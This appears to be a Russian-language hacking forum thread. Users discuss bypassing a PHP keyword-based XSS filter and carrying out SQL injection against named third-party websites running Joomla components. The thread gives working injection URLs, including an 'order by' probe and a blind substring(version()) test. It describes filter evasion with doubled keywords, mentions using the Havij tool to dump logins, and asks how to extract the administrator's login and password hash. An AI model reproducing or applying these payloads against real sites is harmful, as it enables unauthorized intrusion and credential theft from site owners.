Сообщение от
RazyKK
можно ли обойти такую xss фильтрацию?
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>",
"INSERT", "UPDATE", "DROP"
);
$replace = array("");
Прикольно =)
Сообщение от
A_n_d_r_e_i
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+1=1+or der+by+1--+
в общем дальше я ниxуя не понимаю, помогите с этим, где я допустил ошибку и как вытащить логин и хеш админа
Код:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+group+by+11#
При union+select сайт зависает. А при union(select(1),2,3,4,5,6,7,8,9,10,11) не зависает, но false. При uni
unionon, sel
selectect так же false. Поэтому:
Код:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+substring((select+version()),1,1)=5+and+'1'='1
=)
Сообщение от
A_n_d_r_e_i
Да, у меня тоже( С помощью хавиж достал, но только логины
А что помешало достать пароли?
Сообщение от
A_n_d_r_e_i
http://www.incornea.com.co/index.php?option=com_wrapper&view=wrapper&Itemid=3
http://loteriadebogota.com/html/index.php?option=com_wrapper&view=wrapper&Itemid=1 5
Com_wrapper, даже смотреть не буду